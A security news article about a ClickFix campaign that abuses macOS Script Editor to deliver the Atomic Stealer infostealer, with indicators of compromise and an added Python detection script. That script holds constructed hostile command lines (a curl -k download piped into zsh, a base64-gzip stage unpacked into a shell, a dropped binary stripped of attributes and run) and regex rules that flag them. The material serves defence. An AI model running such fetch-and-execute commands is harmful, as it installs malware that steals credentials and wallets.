A sophisticated new ClickFix campaign is bypassing macOS Terminal security by exploiting the built-in Script Editor application to deliver the potent Atomic Stealer malware. This tactic represents a significant evolution in how threat actors adapt to Apple’s escalating security measures, underscoring that social engineering remains a formidable pathway to compromise.
Previously, ClickFix attacks relied on users pasting malicious commands directly into Terminal. However, Apple’s recent security enhancements in macOS 26.4 introduced a scanner for Terminal commands, making this method less effective. Attackers have now pivoted to Script Editor, a legitimate macOS tool, demonstrating their agility in finding alternative routes for malware delivery.
New ClickFix Campaign Leverages Script Editor for Atomic Stealer Deployment
Researchers at Jamf Threat Labs identified this novel attack vector, which utilizes the `applescript` URL scheme. This allows malicious websites to directly invoke Script Editor from a web browser, effectively sidestepping the newly implemented Terminal protections without raising immediate alarms.
The campaign initiates with a deceptive Apple-themed webpage designed to mimic a legitimate disk space cleanup utility. The website provides step-by-step instructions that appear to be standard macOS maintenance procedures, aiming to build user trust and encourage interaction.
When a user clicks an “Execute” button on the fraudulent webpage, the browser silently triggers the `applescript` URL scheme. A security permission dialog then prompts the user to open Script Editor, a step that can easily be mistaken for a routine system operation.
Upon opening, Script Editor presents a script pre-populated with code. This script often includes fake copyright headers, styling itself as an official Apple storage optimization tool to enhance its credibility and lull users into a false sense of security.
The user experience differs slightly depending on the macOS version. While older versions might proceed directly to execution, macOS 26.4 requires users to explicitly approve saving the script to disk before it can run, adding an extra layer of user consent.
Once the user runs the deceptive script, the malicious chain of events unfolds. The embedded commands are obfuscated: the `tr` utility transforms a scrambled string into a working URL at runtime, and the script then fetches that URL with `curl` using the `-k` flag. That flag disables TLS certificate validation, so the download succeeds against untrusted infrastructure without triggering a certificate warning.
The downloaded payload is piped directly into `zsh` and executed entirely in memory, leaving no trace on disk during this initial phase. The first-stage payload is further concealed with base64 encoding and gzip compression. Once decoded, it retrieves a Mach-O binary and saves it as `/tmp/helper`. The binary's extended attributes are stripped, it is marked executable, and it is then launched.
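Each stage above leaves a recognisable process command line in endpoint telemetry. The following Python is an added example, not code from the article or from Jamf Threat Labs: it runs a small set of narrow pattern rules over constructed sample command lines and flags the combinations that mark this chain (the `applescript` URL scheme, `curl -k` piped into a shell, a `tr`-decoded URL alongside `curl`, base64 plus gzip unpacked into a shell, and `/tmp/helper` having its attributes stripped before execution). The sample lines, placeholder URLs and rule names are all constructed for illustration.

```python
import re

# Constructed sample process command lines (not real telemetry). They mirror the
# stages described above: Script Editor launched via the applescript URL scheme,
# a tr-decoded URL fetched with curl -k and piped into zsh, a base64+gzip stage
# unpacked into a shell, and a binary dropped as /tmp/helper with xattrs stripped.
SAMPLE_CMDLINES = [
    "open 'applescript://PLACEHOLDER_SCRIPT'",
    "/bin/zsh -c 'curl -k -s \"$(echo OBFUSCATED_URL | tr a-z n-za-m)\" | zsh'",
    "sh -c 'echo PLACEHOLDER_B64 | base64 -d | gunzip | zsh'",
    "xattr -c /tmp/helper && chmod +x /tmp/helper && /tmp/helper",
    "curl -s https://example.invalid/notes.txt -o notes.txt",  # benign: TLS validated, no shell pipe
    "cat names.txt | tr a-z A-Z",                               # benign: tr without any download
]

# Detection rules as (name, regex). Deliberately narrow so that ordinary curl or
# tr usage does not fire; each rule needs the combination that marks this chain.
RULES = [
    ("applescript_url_scheme", re.compile(r"\bapplescript://", re.I)),
    # curl with certificate checking disabled, output piped into a shell
    ("curl_insecure_piped_to_shell",
     re.compile(r"\bcurl\b.*(?:\s-k\b|--insecure\b).*\|\s*(?:zsh|bash|sh)\b")),
    # a URL (or part of one) rebuilt with tr in the same command that runs curl
    ("tr_decoded_url", re.compile(r"^(?=.*\bcurl\b)(?=.*\btr\s+\S+\s+\S+)")),
    # base64 decode, gunzip and hand-off to a shell in one pipeline
    ("base64_gzip_to_shell",
     re.compile(r"base64\s+(?:-d|--decode|-D)\b.*\|\s*(?:gunzip|gzip\s+-d)\b.*\|\s*(?:zsh|bash|sh)\b")),
    # extended attributes removed and execute bit set on /tmp/helper
    ("tmp_helper_xattr_strip",
     re.compile(r"\bxattr\s+-c\s+/tmp/helper\b.*\bchmod\s+\+x\s+/tmp/helper\b")),
]


def scan_cmdline(cmdline: str) -> list[str]:
    """Return the names of every rule that matches one process command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan_all(cmdlines: list[str]) -> dict[str, list[str]]:
    """Map each flagged command line to its rule hits; clean lines are omitted."""
    return {c: hits for c in cmdlines if (hits := scan_cmdline(c))}


if __name__ == "__main__":
    for cmd, hits in scan_all(SAMPLE_CMDLINES).items():
        print(f"ALERT {hits}: {cmd}")
```

Run against the constructed samples, the four attack-chain lines are flagged and the two benign lines are not; in production the same rules would be applied to the command-line field of process-execution events.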
Atomic Stealer: The Primary Infostealer Payload
The binary in question is a recent variant of Atomic Stealer, a notorious infostealer specifically designed for macOS. This malware is known to exfiltrate sensitive data including browser credentials, saved passwords, cryptocurrency wallet information, and other critical data from compromised systems.
The confirmed indicators of compromise (IOCs) associated with this campaign include the domain `dryvecar.com`. Additionally, `storage-fixes.squarespace.com` and `cleanupmac.mssg.me` have been identified as hosting the deceptive ClickFix webpages used in this attack.
The Mach-O binary, masquerading as `helper` in the `/tmp` directory, has a SHA-256 hash of `3d3c91ee762668c85b74859e4d09a2adfd34841694493b82659fda77fe0c2c44`. macOS users are strongly advised to exercise extreme caution and refrain from executing any scripts prompted by external webpages, irrespective of any official branding they might display. It is crucial to decline any requests from browsers to open Script Editor or other automation tools from unknown sources.
Maintaining macOS with the latest updates is paramount, as it ensures that the most recent built-in security features are active and equipped to defend against evolving threats like this new ClickFix campaign. The ongoing evasion tactics employed by attackers highlight the continuous need for vigilance and proactive security practices among macOS users.